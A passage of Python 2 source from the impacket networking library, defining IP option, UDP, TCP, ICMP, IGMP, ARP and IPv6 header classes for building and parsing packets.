len(opt_bytes): raise ImpactPacketException, "IP Option length is too high" new_option = IPOption(op_type, op_len) new_option.set_bytes(opt_bytes[:op_len]) opt_bytes = opt_bytes[op_len:] opt_left -= op_len self.add_option(new_option) if op_type == IPOption.IPOPT_EOL: break def __str__(self): flags = ' ' if self.get_ip_df(): flags += 'DF ' if self.get_ip_mf(): flags += 'MF ' if self.get_ip_rf(): flags += 'RF ' tmp_str = 'IP%s%s -> %s ' % (flags, self.get_ip_src(),self.get_ip_dst()) for op in self.__option_list: tmp_str += '\n' + op.__str__() if self.child(): tmp_str += '\n' + self.child().__str__() return tmp_str class IPOption(PacketBuffer): IPOPT_EOL = 0 IPOPT_NOP = 1 IPOPT_RR = 7 IPOPT_TS = 68 IPOPT_LSRR = 131 IPOPT_SSRR = 137 def __init__(self, opcode = 0, size = None): if size and (size < 3 or size > 40): raise ImpactPacketException, "IP Options must have a size between 3 and 40 bytes" if(opcode == IPOption.IPOPT_EOL): PacketBuffer.__init__(self, 1) self.set_code(IPOption.IPOPT_EOL) elif(opcode == IPOption.IPOPT_NOP): PacketBuffer.__init__(self, 1) self.set_code(IPOption.IPOPT_NOP) elif(opcode == IPOption.IPOPT_RR): if not size: size = 39 PacketBuffer.__init__(self, size) self.set_code(IPOption.IPOPT_RR) self.set_len(size) self.set_ptr(4) elif(opcode == IPOption.IPOPT_LSRR): if not size: size = 39 PacketBuffer.__init__(self, size) self.set_code(IPOption.IPOPT_LSRR) self.set_len(size) self.set_ptr(4) elif(opcode == IPOption.IPOPT_SSRR): if not size: size = 39 PacketBuffer.__init__(self, size) self.set_code(IPOption.IPOPT_SSRR) self.set_len(size) self.set_ptr(4) elif(opcode == IPOption.IPOPT_TS): if not size: size = 40 PacketBuffer.__init__(self, size) self.set_code(IPOption.IPOPT_TS) self.set_len(size) self.set_ptr(5) self.set_flags(0) else: if not size: raise ImpactPacketError, "Size required for this type" PacketBuffer.__init__(self,size) self.set_code(opcode) self.set_len(size) def append_ip(self, ip): op = self.get_code() if not (op == IPOption.IPOPT_RR or op == IPOption.IPOPT_LSRR or op == IPOption.IPOPT_SSRR or op == IPOption.IPOPT_TS): raise ImpactPacketException, "append_ip() not support for option type %d" % self.opt_type p = self.get_ptr() if not p: raise ImpactPacketException, "append_ip() failed, option ptr uninitialized" if (p + 4) > self.get_len(): raise ImpactPacketException, "append_ip() would overflow option" self.set_ip_address(p - 1, ip) p += 4 self.set_ptr(p) def set_code(self, value): self.set_byte(0, value) def get_code(self): return self.get_byte(0) def set_flags(self, flags): if not (self.get_code() == IPOption.IPOPT_TS): raise ImpactPacketException, "Operation only supported on Timestamp option" self.set_byte(3, flags) def get_flags(self, flags): if not (self.get_code() == IPOption.IPOPT_TS): raise ImpactPacketException, "Operation only supported on Timestamp option" return self.get_byte(3) def set_len(self, len): self.set_byte(1, len) def set_ptr(self, ptr): self.set_byte(2, ptr) def get_ptr(self): return self.get_byte(2) def get_len(self): return len(self.get_bytes()) def __str__(self): map = {IPOption.IPOPT_EOL : "End of List ", IPOption.IPOPT_NOP : "No Operation ", IPOption.IPOPT_RR : "Record Route ", IPOption.IPOPT_TS : "Timestamp ", IPOption.IPOPT_LSRR : "Loose Source Route ", IPOption.IPOPT_SSRR : "Strict Source Route "} tmp_str = "\tIP Option: " op = self.get_code() if map.has_key(op): tmp_str += map[op] else: tmp_str += "Code: %d " % op if op == IPOption.IPOPT_RR or op == IPOption.IPOPT_LSRR or op ==IPOption.IPOPT_SSRR: tmp_str += self.print_addresses() return tmp_str def print_addresses(self): p = 3 tmp_str = "[" if self.get_len() >= 7: # at least one complete IP address while 1: if p + 1 == self.get_ptr(): tmp_str += "#" tmp_str += self.get_ip_address(p) p += 4 if p >= self.get_len(): break else: tmp_str += ", " tmp_str += "] " if self.get_ptr() % 4: # ptr field should be a multiple of 4 tmp_str += "nonsense ptr field: %d " % self.get_ptr() return tmp_str class UDP(Header): protocol = 17 def __init__(self, aBuffer = None): Header.__init__(self, 8) if(aBuffer): self.load_header(aBuffer) def get_uh_sport(self): return self.get_word(0) def set_uh_sport(self, value): self.set_word(0, value) def get_uh_dport(self): return self.get_word(2) def set_uh_dport(self, value): self.set_word(2, value) def get_uh_ulen(self): return self.get_word(4) def set_uh_ulen(self, value): self.set_word(4, value) def get_uh_sum(self): return self.get_word(6) def set_uh_sum(self, value): self.set_word(6, value) self.auto_checksum = 0 def calculate_checksum(self): if self.auto_checksum and (not self.get_uh_sum()): # if there isn't a parent to grab a pseudo-header from we'll assume the user knows what they're doing # and won't meddle with the checksum or throw an exception if not self.parent(): return buffer = self.parent().get_pseudo_header() buffer += self.get_bytes() data = self.get_data_as_string() if(data): buffer.fromstring(data) self.set_uh_sum(self.compute_checksum(buffer)) def get_header_size(self): return 8 def __str__(self): tmp_str = 'UDP %d -> %d' % (self.get_uh_sport(), self.get_uh_dport()) if self.child(): tmp_str += '\n' + self.child().__str__() return tmp_str def get_packet(self): # set total length if(self.get_uh_ulen() == 0): self.set_uh_ulen(self.get_size()) return Header.get_packet(self) class TCP(Header): protocol = 6 TCP_FLAGS_MASK = 0x00FF # lowest 16 bits are the flags def __init__(self, aBuffer = None): Header.__init__(self, 20) self.set_th_off(5) self.__option_list = [] if aBuffer: self.load_header(aBuffer) def add_option(self, option): self.__option_list.append(option) sum = 0 for op in self.__option_list: sum += op.get_size() if sum > 40: raise ImpactPacketException, "Cannot add TCP option, would overflow option space" def get_options(self): return self.__option_list def swapSourceAndDestination(self): oldSource = self.get_th_sport() self.set_th_sport(self.get_th_dport()) self.set_th_dport(oldSource) # # Header field accessors # def set_th_sport(self, aValue): self.set_word(0, aValue) def get_th_sport(self): return self.get_word(0) def get_th_dport(self): return self.get_word(2) def set_th_dport(self, aValue): self.set_word(2, aValue) def get_th_seq(self): return self.get_long(4) def set_th_seq(self, aValue): self.set_long(4, aValue) def get_th_ack(self): return self.get_long(8) def set_th_ack(self, aValue): self.set_long(8, aValue) def get_th_flags(self): return self.get_word(12) & self.TCP_FLAGS_MASK def set_th_flags(self, aValue): masked = self.get_word(12) & (~self.TCP_FLAGS_MASK) nb = masked | (aValue & self.TCP_FLAGS_MASK) return self.set_word(12, nb, ">") def get_th_win(self): return self.get_word(14) def set_th_win(self, aValue): self.set_word(14, aValue) def set_th_sum(self, aValue): self.set_word(16, aValue) self.auto_checksum = 0 def get_th_sum(self): return self.get_word(16) def get_th_urp(self): return self.get_word(18) def set_th_urp(self, aValue): return self.set_word(18, aValue) # Flag accessors def get_th_reserved(self): tmp_value = self.get_byte(12) & 0x0f return tmp_value def get_th_off(self): tmp_value = self.get_byte(12) >> 4 return tmp_value def set_th_off(self, aValue): mask = 0xF0 masked = self.get_byte(12) & (~mask) nb = masked | ( (aValue << 4) & mask) return self.set_byte(12, nb) def get_CWR(self): return self.get_flag(128) def set_CWR(self): return self.set_flags(128) def reset_CWR(self): return self.reset_flags(128) def get_ECE(self): return self.get_flag(64) def set_ECE(self): return self.set_flags(64) def reset_ECE(self): return self.reset_flags(64) def get_URG(self): return self.get_flag(32) def set_URG(self): return self.set_flags(32) def reset_URG(self): return self.reset_flags(32) def get_ACK(self): return self.get_flag(16) def set_ACK(self): return self.set_flags(16) def reset_ACK(self): return self.reset_flags(16) def get_PSH(self): return self.get_flag(8) def set_PSH(self): return self.set_flags(8) def reset_PSH(self): return self.reset_flags(8) def get_RST(self): return self.get_flag(4) def set_RST(self): return self.set_flags(4) def reset_RST(self): return self.reset_flags(4) def get_SYN(self): return self.get_flag(2) def set_SYN(self): return self.set_flags(2) def reset_SYN(self): return self.reset_flags(2) def get_FIN(self): return self.get_flag(1) def set_FIN(self): return self.set_flags(1) def reset_FIN(self): return self.reset_flags(1) # Overriden Methods def get_header_size(self): return 20 + len(self.get_padded_options()) def calculate_checksum(self): if not self.auto_checksum or not self.parent(): return self.set_th_sum(0) buffer = self.parent().get_pseudo_header() buffer += self.get_bytes() buffer += self.get_padded_options() data = self.get_data_as_string() if(data): buffer.fromstring(data) res = self.compute_checksum(buffer) self.set_th_sum(self.compute_checksum(buffer)) def get_packet(self): "Returns entire packet including child data as a string. This is the function used to extract the final packet" # only change th_off value if options are present if len(self.__option_list): self.set_th_off(self.get_header_size() / 4) self.calculate_checksum() bytes = self.get_bytes() + self.get_padded_options() data = self.get_data_as_string() if data: return bytes.tostring() + data else: return bytes.tostring() def load_header(self, aBuffer): self.set_bytes_from_string(aBuffer[:20]) opt_left = (self.get_th_off() - 5) * 4 opt_bytes = array.array('B', aBuffer[20:(20 + opt_left)]) if len(opt_bytes) != opt_left: raise ImpactPacketException, "Cannot load options from truncated packet" while opt_left: op_kind = opt_bytes[0] if op_kind == TCPOption.TCPOPT_EOL or op_kind == TCPOption.TCPOPT_NOP: new_option = TCPOption(op_kind) op_len = 1 else: op_len = opt_bytes[1] if op_len > len(opt_bytes): raise ImpactPacketException, "TCP Option length is too high" if op_len < 2: raise ImpactPacketException, "TCP Option length is too low" new_option = TCPOption(op_kind) new_option.set_bytes(opt_bytes[:op_len]) opt_bytes = opt_bytes[op_len:] opt_left -= op_len self.add_option(new_option) if op_kind == TCPOption.TCPOPT_EOL: break # # Private # def get_flag(self, bit): if self.get_th_flags() & bit: return 1 else: return 0 def reset_flags(self, aValue): tmp_value = self.get_th_flags() & (~aValue) return self.set_th_flags(tmp_value) def set_flags(self, aValue): tmp_value = self.get_th_flags() | aValue return self.set_th_flags(tmp_value) def get_padded_options(self): "Return an array containing all options padded to a 4 byte boundry" op_buf = array.array('B') for op in self.__option_list: op_buf += op.get_bytes() num_pad = (4 - (len(op_buf) % 4)) % 4 if num_pad: op_buf.fromstring("\0" * num_pad) return op_buf def __str__(self): tmp_str = 'TCP ' if self.get_ECE(): tmp_str += 'ece ' if self.get_CWR(): tmp_str += 'cwr ' if self.get_ACK(): tmp_str += 'ack ' if self.get_FIN(): tmp_str += 'fin ' if self.get_PSH(): tmp_str += 'push ' if self.get_RST(): tmp_str += 'rst ' if self.get_SYN(): tmp_str += 'syn ' if self.get_URG(): tmp_str += 'urg ' tmp_str += '%d -> %d' % (self.get_th_sport(), self.get_th_dport()) for op in self.__option_list: tmp_str += '\n' + op.__str__() if self.child(): tmp_str += '\n' + self.child().__str__() return tmp_str class TCPOption(PacketBuffer): TCPOPT_EOL = 0 TCPOPT_NOP = 1 TCPOPT_MAXSEG = 2 TCPOPT_WINDOW = 3 TCPOPT_SACK_PERMITTED = 4 TCPOPT_SACK = 5 TCPOPT_TIMESTAMP = 8 TCPOPT_SIGNATURE = 19 def __init__(self, kind, data = None): if kind == TCPOption.TCPOPT_EOL: PacketBuffer.__init__(self, 1) self.set_kind(TCPOption.TCPOPT_EOL) elif kind == TCPOption.TCPOPT_NOP: PacketBuffer.__init__(self, 1) self.set_kind(TCPOption.TCPOPT_NOP) elif kind == TCPOption.TCPOPT_MAXSEG: PacketBuffer.__init__(self, 4) self.set_kind(TCPOption.TCPOPT_MAXSEG) self.set_len(4) if data: self.set_mss(data) else: self.set_mss(512) elif kind == TCPOption.TCPOPT_WINDOW: PacketBuffer.__init__(self, 3) self.set_kind(TCPOption.TCPOPT_WINDOW) self.set_len(3) if data: self.set_shift_cnt(data) else: self.set_shift_cnt(0) elif kind == TCPOption.TCPOPT_TIMESTAMP: PacketBuffer.__init__(self, 10) self.set_kind(TCPOption.TCPOPT_TIMESTAMP) self.set_len(10) if data: self.set_ts(data) else: self.set_ts(0) elif kind == TCPOption.TCPOPT_SACK_PERMITTED: PacketBuffer.__init__(self, 2) self.set_kind(TCPOption.TCPOPT_SACK_PERMITTED) self.set_len(2) elif kind == TCPOption.TCPOPT_SACK: PacketBuffer.__init__(self, 2) self.set_kind(TCPOption.TCPOPT_SACK) def set_left_edge(self, aValue): self.set_long (2, aValue) def set_right_edge(self, aValue): self.set_long (6, aValue) def set_kind(self, kind): self.set_byte(0, kind) def get_kind(self): return self.get_byte(0) def set_len(self, len): if self.get_size() < 2: raise ImpactPacketException, "Cannot set length field on an option having a size smaller than 2 bytes" self.set_byte(1, len) def get_len(self): if self.get_size() < 2: raise ImpactPacketException, "Cannot retrieve length field from an option having a size smaller than 2 bytes" return self.get_byte(1) def get_size(self): return len(self.get_bytes()) def set_mss(self, len): if self.get_kind() != TCPOption.TCPOPT_MAXSEG: raise ImpactPacketException, "Can only set MSS on TCPOPT_MAXSEG option" self.set_word(2, len) def get_mss(self): if self.get_kind() != TCPOption.TCPOPT_MAXSEG: raise ImpactPacketException, "Can only retrieve MSS from TCPOPT_MAXSEG option" return self.get_word(2) def set_shift_cnt(self, cnt): if self.get_kind() != TCPOption.TCPOPT_WINDOW: raise ImpactPacketException, "Can only set Shift Count on TCPOPT_WINDOW option" self.set_byte(2, cnt) def get_shift_cnt(self): if self.get_kind() != TCPOption.TCPOPT_WINDOW: raise ImpactPacketException, "Can only retrieve Shift Count from TCPOPT_WINDOW option" return self.get_byte(2) def get_ts(self): if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP: raise ImpactPacketException, "Can only retrieve timestamp from TCPOPT_TIMESTAMP option" return self.get_long(2) def set_ts(self, ts): if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP: raise ImpactPacketException, "Can only set timestamp on TCPOPT_TIMESTAMP option" self.set_long(2, ts) def get_ts_echo(self): if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP: raise ImpactPacketException, "Can only retrieve timestamp from TCPOPT_TIMESTAMP option" return self.get_long(6) def set_ts_echo(self, ts): if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP: raise ImpactPacketException, "Can only set timestamp on TCPOPT_TIMESTAMP option" self.set_long(6, ts) def __str__(self): map = { TCPOption.TCPOPT_EOL : "End of List ", TCPOption.TCPOPT_NOP : "No Operation ", TCPOption.TCPOPT_MAXSEG : "Maximum Segment Size ", TCPOption.TCPOPT_WINDOW : "Window Scale ", TCPOption.TCPOPT_TIMESTAMP : "Timestamp " } tmp_str = "\tTCP Option: " op = self.get_kind() if map.has_key(op): tmp_str += map[op] else: tmp_str += " kind: %d " % op if op == TCPOption.TCPOPT_MAXSEG: tmp_str += " MSS : %d " % self.get_mss() elif op == TCPOption.TCPOPT_WINDOW: tmp_str += " Shift Count: %d " % self.get_shift_cnt() elif op == TCPOption.TCPOPT_TIMESTAMP: pass # TODO return tmp_str class ICMP(Header): protocol = 1 ICMP_ECHOREPLY = 0 ICMP_UNREACH = 3 ICMP_UNREACH_NET = 0 ICMP_UNREACH_HOST = 1 ICMP_UNREACH_PROTOCOL = 2 ICMP_UNREACH_PORT = 3 ICMP_UNREACH_NEEDFRAG = 4 ICMP_UNREACH_SRCFAIL = 5 ICMP_UNREACH_NET_UNKNOWN = 6 ICMP_UNREACH_HOST_UNKNOWN = 7 ICMP_UNREACH_ISOLATED = 8 ICMP_UNREACH_NET_PROHIB = 9 ICMP_UNREACH_HOST_PROHIB = 10 ICMP_UNREACH_TOSNET = 11 ICMP_UNREACH_TOSHOST = 12 ICMP_UNREACH_FILTERPROHIB = 13 ICMP_UNREACH_HOST_PRECEDENCE = 14 ICMP_UNREACH_PRECEDENCE_CUTOFF = 15 ICMP_SOURCEQUENCH = 4 ICMP_REDIRECT = 5 ICMP_REDIRECT_NET = 0 ICMP_REDIRECT_HOST = 1 ICMP_REDIRECT_TOSNET = 2 ICMP_REDIRECT_TOSHOST = 3 ICMP_ALTHOSTADDR = 6 ICMP_ECHO = 8 ICMP_ROUTERADVERT = 9 ICMP_ROUTERSOLICIT = 10 ICMP_TIMXCEED = 11 ICMP_TIMXCEED_INTRANS = 0 ICMP_TIMXCEED_REASS = 1 ICMP_PARAMPROB = 12 ICMP_PARAMPROB_ERRATPTR = 0 ICMP_PARAMPROB_OPTABSENT = 1 ICMP_PARAMPROB_LENGTH = 2 ICMP_TSTAMP = 13 ICMP_TSTAMPREPLY = 14 ICMP_IREQ = 15 ICMP_IREQREPLY = 16 ICMP_MASKREQ = 17 ICMP_MASKREPLY = 18 def __init__(self, aBuffer = None): Header.__init__(self, 8) if aBuffer: self.load_header(aBuffer) def get_header_size(self): anamolies = { ICMP.ICMP_TSTAMP : 20, ICMP.ICMP_TSTAMPREPLY : 20, ICMP.ICMP_MASKREQ : 12, ICMP.ICMP_MASKREPLY : 12 } if anamolies.has_key(self.get_icmp_type()): return anamolies[self.get_icmp_type()] else: return 8 def get_icmp_type(self): return self.get_byte(0) def set_icmp_type(self, aValue): self.set_byte(0, aValue) def get_icmp_code(self): return self.get_byte(1) def set_icmp_code(self, aValue): self.set_byte(1, aValue) def get_icmp_cksum(self): return self.get_word(2) def set_icmp_cksum(self, aValue): self.set_word(2, aValue) self.auto_checksum = 0 def get_icmp_gwaddr(self): return self.get_ip_address(4) def set_icmp_gwaddr(self, ip): self.set_ip_address(4, ip) def get_icmp_id(self): return self.get_word(4) def set_icmp_id(self, aValue): self.set_word(4, aValue) def get_icmp_seq(self): return self.get_word(6) def set_icmp_seq(self, aValue): self.set_word(6, aValue) def get_icmp_void(self): return self.get_long(4) def set_icmp_void(self, aValue): self.set_long(4, aValue) def get_icmp_nextmtu(self): return self.get_word(6) def set_icmp_nextmtu(self, aValue): self.set_word(6, aValue) def get_icmp_num_addrs(self): return self.get_byte(4) def set_icmp_num_addrs(self, aValue): self.set_byte(4, aValue) def get_icmp_wpa(self): return self.get_byte(5) def set_icmp_wpa(self, aValue): self.set_byte(5, aValue) def get_icmp_lifetime(self): return self.get_word(6) def set_icmp_lifetime(self, aValue): self.set_word(6, aValue) def get_icmp_otime(self): return self.get_long(8) def set_icmp_otime(self, aValue): self.set_long(8, aValue) def get_icmp_rtime(self): return self.get_long(12) def set_icmp_rtime(self, aValue): self.set_long(12, aValue) def get_icmp_ttime(self): return self.get_long(16) def set_icmp_ttime(self, aValue): self.set_long(16, aValue) def get_icmp_mask(self): return self.get_ip_address(8) def set_icmp_mask(self, mask): self.set_ip_address(8, mask) def calculate_checksum(self): if self.auto_checksum and (not self.get_icmp_cksum()): buffer = self.get_buffer_as_string() data = self.get_data_as_string() if data: buffer += data tmp_array = array.array('B', buffer) self.set_icmp_cksum(self.compute_checksum(tmp_array)) def get_type_name(self, aType): tmp_type = {0:'ECHOREPLY', 3:'UNREACH', 4:'SOURCEQUENCH',5:'REDIRECT', 6:'ALTHOSTADDR', 8:'ECHO', 9:'ROUTERADVERT', 10:'ROUTERSOLICIT', 11:'TIMXCEED', 12:'PARAMPROB', 13:'TSTAMP', 14:'TSTAMPREPLY', 15:'IREQ', 16:'IREQREPLY', 17:'MASKREQ', 18:'MASKREPLY', 30:'TRACEROUTE', 31:'DATACONVERR', 32:'MOBILE REDIRECT', 33:'IPV6 WHEREAREYOU', 34:'IPV6 IAMHERE', 35:'MOBILE REGREQUEST', 36:'MOBILE REGREPLY', 39:'SKIP', 40:'PHOTURIS'} answer = tmp_type.get(aType, 'UNKNOWN') return answer def get_code_name(self, aType, aCode): tmp_code = {3:['UNREACH NET', 'UNREACH HOST', 'UNREACH PROTOCOL', 'UNREACH PORT', 'UNREACH NEEDFRAG', 'UNREACH SRCFAIL', 'UNREACH NET UNKNOWN', 'UNREACH HOST UNKNOWN', 'UNREACH ISOLATED', 'UNREACH NET PROHIB', 'UNREACH HOST PROHIB', 'UNREACH TOSNET', 'UNREACH TOSHOST', 'UNREACH FILTER PROHIB', 'UNREACH HOST PRECEDENCE', 'UNREACH PRECEDENCE CUTOFF', 'UNKNOWN ICMP UNREACH']} tmp_code[5] = ['REDIRECT NET', 'REDIRECT HOST', 'REDIRECT TOSNET', 'REDIRECT TOSHOST'] tmp_code[9] = ['ROUTERADVERT NORMAL', None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,'ROUTERADVERT NOROUTE COMMON'] tmp_code[11] = ['TIMXCEED INTRANS ', 'TIMXCEED REASS'] tmp_code[12] = ['PARAMPROB ERRATPTR ', 'PARAMPROB OPTABSENT', 'PARAMPROB LENGTH'] tmp_code[40] = [None, 'PHOTURIS UNKNOWN INDEX', 'PHOTURIS AUTH FAILED', 'PHOTURIS DECRYPT FAILED'] if tmp_code.has_key(aType): tmp_list = tmp_code[aType] if ((aCode + 1) > len(tmp_list)) or (not tmp_list[aCode]): return 'UNKNOWN' else: return tmp_list[aCode] else: return 'UNKNOWN' def __str__(self): tmp_type = self.get_icmp_type() tmp_code = self.get_icmp_code() tmp_str = 'ICMP type: ' + self.get_type_name(tmp_type) tmp_str+= ' code: ' + self.get_code_name(tmp_type, tmp_code) if self.child(): tmp_str += '\n' + self.child().__str__() return tmp_str def isDestinationUnreachable(self): return self.get_icmp_type() == 3 def isError(self): return not self.isQuery() def isHostUnreachable(self): return self.isDestinationUnreachable() and (self.get_icmp_code() == 1) def isNetUnreachable(self): return self.isDestinationUnreachable() and (self.get_icmp_code() == 0) def isPortUnreachable(self): return self.isDestinationUnreachable() and (self.get_icmp_code() == 3) def isProtocolUnreachable(self): return self.isDestinationUnreachable() and (self.get_icmp_code() == 2) def isQuery(self): tmp_dict = {8:'', 9:'', 10:'', 13:'', 14:'', 15:'', 16:'', 17:'', 18:''} return tmp_dict.has_key(self.get_icmp_type()) class IGMP(Header): protocol = 2 def __init__(self, aBuffer = None): Header.__init__(self, 8) if aBuffer: self.load_header(aBuffer) def get_igmp_type(self): return self.get_byte(0) def set_igmp_type(self, aValue): self.set_byte(0, aValue) def get_igmp_code(self): return self.get_byte(1) def set_igmp_code(self, aValue): self.set_byte(1, aValue) def get_igmp_cksum(self): return self.get_word(2) def set_igmp_cksum(self, aValue): self.set_word(2, aValue) def get_igmp_group(self): return self.get_long(4) def set_igmp_group(self, aValue): self.set_long(4, aValue) def get_header_size(self): return 8 def get_type_name(self, aType): tmp_dict = {0x11:'HOST MEMBERSHIP QUERY ', 0x12:'v1 HOST MEMBERSHIP REPORT ', 0x13:'IGMP DVMRP ', 0x14:' PIM ', 0x16:'v2 HOST MEMBERSHIP REPORT ', 0x17:'HOST LEAVE MESSAGE ', 0x1e:'MTRACE REPLY ', 0X1f:'MTRACE QUERY '} answer = tmp_type.get(aType, 'UNKNOWN TYPE OR VERSION ') return answer def calculate_checksum(self): if self.auto_checksum and (not self.get_igmp_cksum()): self.set_igmp_cksum(self.compute_checksum(self.get_bytes())) def __str__(self): knowcode = 0 tmp_str = 'IGMP: ' + self.get_type_name(self.get_igmp_type()) tmp_str += 'Group: ' + socket.inet_ntoa(pack('!L',self.get_igmp_group())) if self.child(): tmp_str += '\n' + self.child().__str__() return tmp_str class ARP(Header): ethertype = 0x806 def __init__(self, aBuffer = None): Header.__init__(self, 7) if aBuffer: self.load_header(aBuffer) def get_ar_hrd(self): return self.get_word(0) def set_ar_hrd(self, aValue): self.set_word(0, aValue) def get_ar_pro(self): return self.get_word(2) def set_ar_pro(self, aValue): self.set_word(2, aValue) def get_ar_hln(self): return self.get_byte(4) def set_ar_hln(self, aValue): self.set_byte(4, aValue) def get_ar_pln(self): return self.get_byte(5) def set_ar_pln(self, aValue): self.set_byte(5, aValue) def get_ar_op(self): return self.get_word(6) def set_ar_op(self, aValue): self.set_word(6, aValue) def get_ar_sha(self): tmp_size = self.get_ar_hln() return self.get_bytes().tolist()[8: 8 + tmp_size] def set_ar_sha(self, aValue): for i in range(0, self.get_ar_hln()): self.set_byte(i + 8, aValue[i]) def get_ar_spa(self): tmp_size = self.get_ar_pln() return self.get_bytes().tolist()[8 + self.get_ar_hln(): 8 + self.get_ar_hln() + tmp_size] def set_ar_spa(self, aValue): for i in range(0, self.get_ar_pln()): self.set_byte(i + 8 + self.get_ar_hln(), aValue[i]) def get_ar_tha(self): tmp_size = self.get_ar_hln() tmp_from = 8 + self.get_ar_hln() + self.get_ar_pln() return self.get_bytes().tolist()[tmp_from: tmp_from + tmp_size] def set_ar_tha(self, aValue): tmp_from = 8 + self.get_ar_hln() + self.get_ar_pln() for i in range(0, self.get_ar_hln()): self.set_byte(i + tmp_from, aValue[i]) def get_ar_tpa(self): tmp_size = self.get_ar_pln() tmp_from = 8 + ( 2 * self.get_ar_hln()) + self.get_ar_pln() return self.get_bytes().tolist()[tmp_from: tmp_from + tmp_size] def set_ar_tpa(self, aValue): tmp_from = 8 + (2 * self.get_ar_hln()) + self.get_ar_pln() for i in range(0, self.get_ar_pln()): self.set_byte(i + tmp_from, aValue[i]) def get_header_size(self): return 8 + (2 * self.get_ar_hln()) + (2 * self.get_ar_pln()) def get_op_name(self, ar_op): tmp_dict = {1:'REQUEST', 2:'REPLY', 3:'REVREQUEST', 4:'REVREPLY', 8:'INVREQUEST', 9:'INVREPLY'} answer = tmp_dict.get(ar_op, 'UNKNOWN') return answer def get_hrd_name(self, ar_hrd): tmp_dict = { 1:'ARPHRD ETHER', 6:'ARPHRD IEEE802', 15:'ARPHRD FRELAY'} answer = tmp_dict.get(ar_hrd, 'UNKNOWN') return answer def as_hrd(self, anArray): if not anArray: return '' tmp_str = '%x' % anArray[0] for i in range(1, len(anArray)): tmp_str += ':%x' % anArray[i] return tmp_str def as_pro(self, anArray): if not anArray: return '' tmp_str = '%d' % anArray[0] for i in range(1, len(anArray)): tmp_str += '.%d' % anArray[i] return tmp_str def __str__(self): tmp_op = self.get_ar_op() tmp_str = 'ARP format: ' + self.get_hrd_name(self.get_ar_hrd()) + ' ' tmp_str += 'opcode: ' + self.get_op_name(tmp_op) tmp_str += '\n' + self.as_hrd(self.get_ar_sha()) + ' -> ' tmp_str += self.as_hrd(self.get_ar_tha()) tmp_str += '\n' + self.as_pro(self.get_ar_spa()) + ' -> ' tmp_str += self.as_pro(self.get_ar_tpa()) if self.child(): tmp_str += '\n' + self.child().__str__() return tmp_str def example(): #To execute an example, remove this line a = Ethernet() b = ARP() c = Data('Hola loco!!!') b.set_ar_hln(6) b.set_ar_pln(4) #a.set_ip_dst('192.168.22.6') #a.set_ip_src('1.1.1.2') a.contains(b) b.contains(c) b.set_ar_op(2) b.set_ar_hrd(1) b.set_ar_spa((192, 168, 22, 6)) b.set_ar_tpa((192, 168, 66, 171)) a.set_ether_shost((0x0, 0xe0, 0x7d, 0x8a, 0xef, 0x3d)) a.set_ether_dhost((0x0, 0xc0, 0xdf, 0x6, 0x5, 0xe)) print "beto %s" % a impacket-0.9.10/impacket/IP6.py0000600000076500000240000001272312141750575016223 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: IP6.py 529 2012-04-29 21:39:46Z bethus@gmail.com $ # from ImpactPacket import Header from IP6_Address import IP6_Address import struct import array class IP6(Header): #Ethertype value for IPv6 ethertype = 0x86DD HEADER_SIZE = 40 IP_PROTOCOL_VERSION = 6 def __init__(self, buffer = None): Header.__init__(self, IP6.HEADER_SIZE) self.set_protocol_version(IP6.IP_PROTOCOL_VERSION) if (buffer): self.load_header(buffer) def get_header_size(self): return IP6.HEADER_SIZE def __str__(self): protocol_version = self.get_protocol_version() traffic_class = self.get_traffic_class() flow_label = self.get_flow_label() payload_length = self.get_payload_length() next_header = self.get_next_header() hop_limit = self.get_hop_limit() source_address = self.get_source_address() destination_address = self.get_destination_address() s = "Protocol version: " + str(protocol_version) + "\n" s += "Traffic class: " + str(traffic_class) + "\n" s += "Flow label: " + str(flow_label) + "\n" s += "Payload length: " + str(payload_length) + "\n" s += "Next header: " + str(next_header) + "\n" s += "Hop limit: " + str(hop_limit) + "\n" s += "Source address: " + source_address.as_string() + "\n" s += "Destination address: " + destination_address.as_string() + "\n" return s def get_pseudo_header(self): source_address = self.get_source_address().as_bytes() #FIXME - Handle Routing header special case destination_address = self.get_destination_address().as_bytes() #FIXME - Check if upper-layer protocol has a packet length field #Else, compute it from the payload length subtracting the extension headers length upper_layer_packet_length = struct.pack('!L', self.get_payload_length()) reserved_bytes = [ 0x00, 0x00, 0x00 ] #FIXME - If there are extension headers, fetch the correct upper-player protocol number by traversing the list upper_layer_protocol_number = struct.pack('B', self.get_next_header()) pseudo_header = array.array('B') pseudo_header.extend(source_address) pseudo_header.extend(destination_address) pseudo_header.fromstring(upper_layer_packet_length) pseudo_header.fromlist(reserved_bytes) pseudo_header.fromstring(upper_layer_protocol_number) return pseudo_header ############################################################################ def get_protocol_version(self): return (self.get_byte(0) & 0xF0) >> 4 def get_traffic_class(self): return ((self.get_byte(0) & 0x0F) << 4) | ((self.get_byte(1) & 0xF0) >> 4) def get_flow_label(self): return (self.get_byte(1) & 0x0F) << 16 | (self.get_byte(2) << 8) | self.get_byte(3) def get_payload_length(self): return (self.get_byte(4) << 8) | self.get_byte(5) def get_next_header(self): return (self.get_byte(6)) def get_hop_limit(self): return (self.get_byte(7)) def get_source_address(self): address = IP6_Address(self.get_bytes()[8:24]) return (address) def get_destination_address(self): address = IP6_Address(self.get_bytes()[24:40]) return (address) ############################################################################ def set_protocol_version(self, version): if (version != 6): raise Exception('set_protocol_version - version != 6') #Fetch byte, clear high nibble b = self.get_byte(0) & 0x0F #Store version number in high nibble b |= (version << 4) #Store byte in buffer #This behaviour is repeated in the rest of the methods self.set_byte(0, b) def set_traffic_class(self, traffic_class): b0 = self.get_byte(0) & 0xF0 b1 = self.get_byte(1) & 0x0F b0 |= (traffic_class & 0xF0) >> 4 b1 |= (traffic_class & 0x0F) << 4 self.set_byte(0, b0) self.set_byte(1, b1) def set_flow_label(self, flow_label): b1 = self.get_byte(1) & 0xF0 b1 |= (flow_label & 0xF0000) >> 16 self.set_byte(1, b1) self.set_byte(2, (flow_label & 0x0FF00) >> 8) self.set_byte(3, (flow_label & 0x000FF)) def set_payload_length(self, payload_length): self.set_byte(4, (payload_length & 0xFF00) >> 8) self.set_byte(5, (payload_length & 0x00FF)) def set_next_header(self, next_header): self.set_byte(6, next_header) def set_hop_limit(self, hop_limit): self.set_byte(7, hop_limit) 